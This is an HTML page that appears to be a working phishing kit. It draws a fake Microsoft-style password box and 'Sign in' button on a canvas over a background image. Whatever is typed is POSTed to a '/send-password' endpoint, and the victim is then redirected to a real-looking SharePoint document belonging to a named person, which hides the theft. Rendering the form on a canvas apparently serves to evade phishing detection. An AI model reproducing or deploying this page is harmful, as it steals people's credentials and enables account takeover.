<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <title>Canvas Login</title>
  <style>
    body { margin: 0; overflow: hidden; }
    canvas { display: block; }
  </style>
</head>
<body>
<canvas id="canvas" width="1359" height="633"></canvas>
<script>
// Get canvas & context
const canvas = document.getElementById('canvas');
const ctx = canvas.getContext('2d');

// Load your background image
const bgImage = new Image();
bgImage.src = 'background1.png'; // Match your file name

// Updated, confirmed positions:
const inputBox = { x: 505, y: 231, width: 345, height: 40 };
const button = { x: 748, y: 325, width: 109, height: 35 };

let inputText = '';
let isTyping = false;
let inputClickedOnce = false;

let cursorVisible = true;
let lastBlink = 0;

// Start loop when image loads
bgImage.onload = () => requestAnimationFrame(loop);

function loop(timestamp) {
  if (timestamp - lastBlink > 500) {
    cursorVisible = !cursorVisible;
    lastBlink = timestamp;
  }
  draw();
  requestAnimationFrame(loop);
}

function draw() {
  ctx.clearRect(0, 0, canvas.width, canvas.height);
  ctx.drawImage(bgImage, 0, 0, canvas.width, canvas.height);

  // ✅ Input box background only, no border
  ctx.fillStyle = inputClickedOnce ? '#fff' : '#f5f5f5';
  ctx.fillRect(inputBox.x, inputBox.y, inputBox.width, inputBox.height);

  // ✅ Text inside box
  ctx.fillStyle = '#000';
  ctx.font = '16px Arial';
  ctx.textBaseline = 'middle';
  ctx.textAlign = 'start';
  const displayText = inputText || 'Password';
  const textX = inputBox.x + 10;
  const textY = inputBox.y + inputBox.height / 2;
  ctx.fillText(displayText, textX, textY);

  // ✅ Blinking cursor
  if (isTyping && cursorVisible) {
    const textWidth = ctx.measureText(inputText).width;
    const cursorX = textX + textWidth + 2;
    const cursorY = inputBox.y + 8;
    const cursorHeight = inputBox.height - 16;

    ctx.beginPath();
    ctx.moveTo(cursorX, cursorY);
    ctx.lineTo(cursorX, cursorY + cursorHeight);
    ctx.strokeStyle = '#000';
    ctx.lineWidth = 1;
    ctx.stroke();
  }

  // ✅ Sign In button
  ctx.fillStyle = '#0078d4';
  ctx.fillRect(button.x, button.y, button.width, button.height);
  ctx.fillStyle = '#fff';
  ctx.font = '18px Arial';
  ctx.textAlign = 'center';
  ctx.fillText('Sign in', button.x + button.width / 2, button.y + button.height / 2 + 5);
}

// ✅ Click handler
canvas.addEventListener('click', (e) => {
  const rect = canvas.getBoundingClientRect();
  const x = e.clientX - rect.left;
  const y = e.clientY - rect.top;

  if (x >= inputBox.x && x <= inputBox.x + inputBox.width &&
      y >= inputBox.y && y <= inputBox.y + inputBox.height) {
    isTyping = true;
    inputClickedOnce = true;
  } else {
    isTyping = false;
  }

  if (x >= button.x && x <= button.x + button.width &&
      y >= button.y && y <= button.y + button.height) {
    if (!inputText) {
      alert('Please enter your password!');
      return;
    }

    // Send POST request and redirect
    fetch('/send-password', {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({ password: inputText })
    })
    .then(res => res.json())
    .then(data => {
      if (data.success) {
        window.location.href = 'https://farmersedge-my.sharepoint.com/:w:/g/personal/thom_weir_farmersedge_ca/EU-EAWlqZ4RJpbQskh6diXgBwlF_oaAWM4kc68pxFUwn6A';
      } else {
        alert(data.message || 'Something went wrong.');
      }
    })
    .catch(err => alert('Error: ' + err));
  }
});

// ✅ Typing input
document.addEventListener('keydown', (e) => {
  if (isTyping) {
    if (e.key === 'Backspace') {
      inputText = inputText.slice(0, -1);
    } else if (e.key.length === 1) {
      inputText += e.key;
    } else if (e.key === 'Enter') {
      isTyping = false;
    }
  }
});
</script>
</body>
</html>
